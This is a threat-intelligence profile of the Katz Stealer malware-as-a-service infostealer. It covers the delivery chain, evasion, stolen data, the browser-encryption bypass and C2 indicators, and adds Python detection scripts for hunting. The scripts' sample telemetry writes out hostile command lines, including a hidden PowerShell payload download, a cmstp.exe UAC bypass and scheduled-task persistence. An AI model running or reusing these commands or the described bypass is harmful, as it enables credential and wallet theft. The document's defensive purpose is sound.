Katz Stealer
Katz Stealer is an information-stealing malware family operated as a Malware-as-a-Service (MaaS) platform and launched in early 2025. It was advertised by the user “katzadmin” on BreachForums on April 13, 2025, with later advertisements on exploit[.]in and xss[.]is, and was also marketed via Telegram and Discord. It is described as a feature-rich infostealer with a web-based panel for generating payloads and managing stolen data.
Delivery has most often been observed through phishing emails or trojanized downloads. Reported infection chains begin with a malicious .gz, ZIP, or RAR archive containing an obfuscated JavaScript or VBS dropper that launches PowerShell. The PowerShell stage retrieves payload data steganographically embedded in image files, decodes it in memory, and may hand off to a .NET loader stage. Katz Stealer has also been delivered by PhantomVAI Loader (formerly referred to as Katz Stealer Loader, and also known as VMDetectLoader or VMDetector Loader), a C#/.NET loader that performs VM checks, establishes persistence, downloads a final payload from a supplied URL, and injects it into a legitimate process using process hollowing. Unit 42 observed MSBuild.exe as the most common injection target, while other reporting describes injection into RegAsm.exe or calc.exe/calc64.exe depending on the campaign. Some campaigns also used cmstp.exe for UAC bypass, and scheduled tasks or Run keys for persistence.
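As an added example (not code from the page or from any of the vendors it cites), the Python below runs a detection pass for the chain just described over constructed process-creation events: a script host launching PowerShell, PowerShell fetching an image file, MSBuild.exe/RegAsm.exe/calc.exe started by an unexpected parent, cmstp.exe fed an INF from outside C:\Windows, and scheduled-task or Run-key persistence. The event field names, the expected-parent sets and the sample events are assumptions.

```python
"""Heuristic detections for the Katz Stealer / PhantomVAI delivery chain described
above, run over constructed process-creation events. Added example, not code from
any of the page's sources; the event shape (pid/ppid/image/parent_image/cmdline) is
an assumed flattening of Sysmon Event ID 1, and the expected-parent sets are
assumptions to tune per estate."""
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Hollowing targets named in reporting, mapped to the parents under which they are
# normally launched (assumption). powershell.exe is deliberately NOT listed for
# MSBuild/RegAsm: a .NET loader executing inside the PowerShell stage would spawn
# the target from powershell.exe, which is the case we want to see.
EXPECTED_PARENTS = {
    "msbuild.exe": {"devenv.exe", "msbuild.exe", "dotnet.exe"},
    "regasm.exe": {"msiexec.exe", "devenv.exe"},
    "calc.exe": {"explorer.exe"},
    "calc64.exe": {"explorer.exe"},
}
PS_DOWNLOAD_RE = re.compile(
    r"downloadstring|downloaddata|invoke-webrequest|\biwr\b|net\.webclient", re.I)
IMAGE_URL_RE = re.compile(r"https?://\S+\.(?:png|jpe?g|gif|bmp)\b", re.I)


def basename(path):
    return PureWindowsPath(path).name.lower()


def ancestry(events, pid):
    """Walk ppid links and return [image, parent, grandparent, ...] basenames."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Return (rule, pid) findings; each rule maps to one stage of the chain."""
    findings = []
    for e in events:
        img, parent = basename(e["image"]), basename(e["parent_image"])
        cmd = e.get("cmdline", "")
        # Dropper stage: JS/VBS script host launching PowerShell.
        if parent in SCRIPT_HOSTS and img == "powershell.exe":
            findings.append(("script_host_spawns_powershell", e["pid"]))
        # PowerShell pulling an image file that carries the stego-embedded payload.
        if img == "powershell.exe" and PS_DOWNLOAD_RE.search(cmd) and IMAGE_URL_RE.search(cmd):
            findings.append(("powershell_fetches_image_payload", e["pid"]))
        # Hollowing target started by something other than its usual parent.
        if img in EXPECTED_PARENTS and parent not in EXPECTED_PARENTS[img]:
            findings.append(("hollowing_target_unusual_parent", e["pid"]))
        # cmstp.exe UAC bypass: INF supplied from outside C:\Windows.
        if img == "cmstp.exe" and re.search(r"\.inf\b", cmd, re.I) and "\\windows\\" not in cmd.lower():
            findings.append(("cmstp_inf_outside_windows", e["pid"]))
        # Persistence: scheduled task or Run key.
        if img == "schtasks.exe" and "/create" in cmd.lower():
            findings.append(("scheduled_task_created", e["pid"]))
        if img == "reg.exe" and re.search(r"currentversion\\run\b", cmd, re.I):
            findings.append(("run_key_added", e["pid"]))
    return findings


# Constructed sample telemetry (not real logs); 203.0.113.10 is a documentation address.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 10, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\Invoice.js"'},
    {"pid": 102, "ppid": 101, "image": PS, "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell.exe -w hidden -nop -c \"$b=(New-Object Net.WebClient)"
                ".DownloadData('http://203.0.113.10/cat.png')\""},
    {"pid": 103, "ppid": 102, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "parent_image": PS, "cmdline": "MSBuild.exe"},
    {"pid": 104, "ppid": 102, "image": r"C:\Windows\System32\cmstp.exe", "parent_image": PS,
     "cmdline": r"cmstp.exe /au C:\Users\alice\AppData\Local\Temp\x.inf"},
    {"pid": 105, "ppid": 102, "image": r"C:\Windows\System32\schtasks.exe", "parent_image": PS,
     "cmdline": r"schtasks.exe /create /sc onlogon /tn Updater /tr C:\Users\alice\AppData\Roaming\up.exe"},
    # Benign control: Visual Studio building a project.
    {"pid": 200, "ppid": 20, "image": r"C:\Program Files\MSBuild\MSBuild.exe",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
     "cmdline": "MSBuild.exe proj.csproj"},
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:34} pid={pid} chain={' <- '.join(ancestry(SAMPLE_EVENTS, pid))}")
```

The one design choice worth calling out is that powershell.exe is not accepted as a parent of MSBuild.exe or RegAsm.exe: when the .NET loader runs inside the PowerShell stage, that is precisely the parent you will see, so whitelisting it would blind the rule to this chain. Tune the expected-parent sets against your build fleet before deploying.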
Katz Stealer includes anti-analysis and geofencing behavior. It checks locale, keyboard layout, and default language settings and stops execution if it detects CIS-related country codes or languages. Reported anti-analysis checks include BIOS and system artifact inspection for VirtualBox and VMware, as well as checks on resolution and uptime.
Its collection scope is broad. High-confidence reporting states it steals browser credentials and browser data, including passwords, cookies, session tokens, autofill data, and stored credit card/CVV data, from Chrome, Edge, Brave, Firefox, and other Chromium- and Gecko-based browsers; Firefox artifacts such as logins.json and key4.db are specifically targeted. It targets cryptocurrency wallets and browser wallet extensions, including MetaMask, Phantom, Binance, Exodus, Coinomi, Dash, Dogecoin, Litecoin, Monero, Bitcoin, and Ethereum-related assets. It also steals Telegram, Discord, Steam and other game-related data, email client data, FTP client data, VPN data and credentials, Wi-Fi credentials, operating system information, screenshots, clipboard contents and, in some reporting, audio/video capture.
Multiple sources state Katz Stealer can bypass Chromium's Application Bound Encryption (ABE) by injecting into headless browser processes and using the browser's or OS's cryptographic context to decrypt protected secrets. ABE binds the key that protects cookies and saved passwords to the browser's own identity, with decryption brokered by a privileged browser service that checks the calling process, so code running inside a legitimate browser process keeps the ability to decrypt; launching a hidden browser instance and injecting into it gives the stealer that position. Reported artifacts include a DLL written to %temp% for browser injection and decrypted browser key material stored as text files such as decrypted_chrome_key.txt under %APPDATA%. Both are useful hunt pivots: a browser process loading a freshly written DLL from %temp%, or a plaintext key file appearing under %APPDATA%.
Command-and-control communications are described as HTTP/HTTPS-based with hardcoded C2 IPs per instance, continuous beaconing, and chunked exfiltration for larger data. Reported Katz Stealer-related infrastructure includes domains katz-panel[.]com, katz-stealer[.]com, katzstealer[.]com, twist2katz[.]com, and Zxczxczxczxc.twist2katz[.]com, and IPs 172.67.146[.]103, 185.107.74[.]40, 195.182.25[.]71, 31.177.109[.]39, and 80.64.18[.]219. Reported operator-associated handles include Katzadmin, KatzStealer, @katzst, @katzcontact, and @katzadmin, plus qTOX ID 375AB62BD333F80905E612DB71BEE06660C40F00AAF393FD7F8605DF5761E47670B6578C9410.
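The following added example (not the page's or any vendor's code) turns the two preceding paragraphs into a hunt: it refangs the domains and IPs listed above, matches them against constructed DNS and connection log lines with subdomain-aware matching, and flags the two host artifacts reported for the App-Bound Encryption bypass (a DLL in %temp% that a browser process subsequently loads, and decrypted_chrome_key.txt under %APPDATA%). The log format, field names, placeholder process name and sample events are assumptions.

```python
"""Matching the Katz Stealer infrastructure indicators and host artifacts named in the
profile above against constructed telemetry. Added example, not the page's or any
vendor's code: the indicator values are copied from the page (defanged) and refanged
here; the log line format, field names and sample events are assumptions."""
import re
from pathlib import PureWindowsPath

DEFANGED_DOMAINS = ["katz-panel[.]com", "katz-stealer[.]com", "katzstealer[.]com",
                    "twist2katz[.]com", "Zxczxczxczxc.twist2katz[.]com"]
DEFANGED_IPS = ["172.67.146[.]103", "185.107.74[.]40", "195.182.25[.]71",
                "31.177.109[.]39", "80.64.18[.]219"]


def refang(s):
    """Undo the [.] and hxxp defanging conventions used in threat reports."""
    return s.replace("[.]", ".").replace("hxxp", "http").lower()


DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}
IPS = {refang(i) for i in DEFANGED_IPS}


def domain_hit(name):
    """Exact or subdomain match; returns the most specific listed domain, or None."""
    name = name.lower().rstrip(".")
    hits = [d for d in DOMAINS if name == d or name.endswith("." + d)]
    return max(hits, key=len) if hits else None


# Assumed log shape: "<ts> <host> dns q=<name> a=<ip>" or "<ts> <host> conn dst=<ip>:<port>".
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<kind>dns|conn) (?P<rest>.*)$")
FIELD_RE = re.compile(r"(\w+)=(\S+)")


def match_network(lines):
    """Return (line_no, kind, indicator) for every DNS query/answer or connection hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        f = dict(FIELD_RE.findall(m["rest"]))
        if m["kind"] == "dns":
            d = domain_hit(f.get("q", ""))
            if d:
                hits.append((n, "domain", d))
            if f.get("a") in IPS:
                hits.append((n, "ip", f["a"]))
        else:
            ip = f.get("dst", "").rsplit(":", 1)[0]
            if ip in IPS:
                hits.append((n, "ip", ip))
    return hits


BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "firefox.exe"}


def _under(path, *dirs):
    """True when every named directory appears as a component of the path."""
    p = path.lower()
    return all(f"\\{d}\\" in p for d in dirs)


def match_host_artifacts(events):
    """Flag the two file artifacts from reporting: a DLL dropped in %temp% that a
    browser then loads, and decrypted_chrome_key.txt appearing under %APPDATA%."""
    hits, temp_dlls = [], set()
    for e in events:
        path, proc = e["path"], e["process"].lower()
        name = PureWindowsPath(path).name.lower()
        if e["event"] == "create" and name.endswith(".dll") and _under(path, "appdata", "local", "temp"):
            temp_dlls.add(path.lower())
        if e["event"] == "imageload" and proc in BROWSERS and path.lower() in temp_dlls:
            hits.append(("browser_loaded_temp_dll", path))
        if e["event"] == "create" and name == "decrypted_chrome_key.txt" and _under(path, "appdata", "roaming"):
            hits.append(("decrypted_chrome_key_artifact", path))
    return hits


# Constructed samples; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges
# and "stealer.exe" is a placeholder process name, not a reported file name.
SAMPLE_LOG = [
    "2025-05-02T10:00:01Z WS01 dns q=Zxczxczxczxc.twist2katz.com a=172.67.146.103",
    "2025-05-02T10:00:03Z WS01 conn dst=185.107.74.40:443",
    "2025-05-02T10:00:05Z WS01 dns q=example.org a=203.0.113.5",
    "2025-05-02T10:00:07Z WS01 conn dst=198.51.100.7:443",
]
SAMPLE_FILE_EVENTS = [
    {"event": "create", "process": "stealer.exe", "path": r"C:\Users\alice\AppData\Local\Temp\inj.dll"},
    {"event": "imageload", "process": "chrome.exe", "path": r"C:\Users\alice\AppData\Local\Temp\inj.dll"},
    {"event": "imageload", "process": "chrome.exe", "path": r"C:\Program Files\Google\Chrome\Application\chrome.dll"},
    {"event": "create", "process": "stealer.exe", "path": r"C:\Users\alice\AppData\Roaming\decrypted_chrome_key.txt"},
]

if __name__ == "__main__":
    print(match_network(SAMPLE_LOG))
    print(match_host_artifacts(SAMPLE_FILE_EVENTS))
```

Because the C2 addresses are hardcoded per build, any list of them ages quickly; treat the network indicators as seeds for retrospective search and lean on the host artifacts, which follow from the technique rather than from a particular build.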
Katz Stealer has been observed in campaigns targeting organizations worldwide across sectors including manufacturing, education, utilities, technology, healthcare, information, and government, as well as individuals. It has also been noted in campaigns targeting VPN credentials and crypto assets. Reporting describes broad criminal adoption due to its ease of use, customizable features, credential theft capability, and modern evasion and anti-analysis features.
Techniques & procedures
12 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (3 techniques). Supporting excerpt: "The FBI warning concerning Medusa ransomware compromising VPN credentials... One more? OK, the recent Katz Stealer warning as this threat also targeted VPN credentials."
Execution (3 techniques)
Persistence (1 technique)
Privilege Escalation (3 techniques)
Stealth (8 techniques). Supporting excerpts: "Threat actors obfuscate these scripts in an attempt to bypass detections." / "PhantomVAI Loader Uses Steganography in Images to Inject Katz Stealer and Evade Sandboxes" / "It then injects this payload into a target process that is also defined by a command-line parameter, using the process hollowing technique."
IOCs tracked for this family
28 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, including file hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
22 sources tracked across advisories, community write-ups, and news. Source summaries:
An infostealer associated with PhantomVAI's original marketing and delivery use case.
Infostealer payload referenced as being delivered/injected by PhantomVAI (via steganography, per the related post's title).
Katz Stealer is a Malware-as-a-Service platform that targets credentials and cryptocurrency assets, offered to affiliates for a fee in the same subscription model as ransomware-as-a-service.
Credential and information stealer distributed via commodity loaders in phishing campaigns.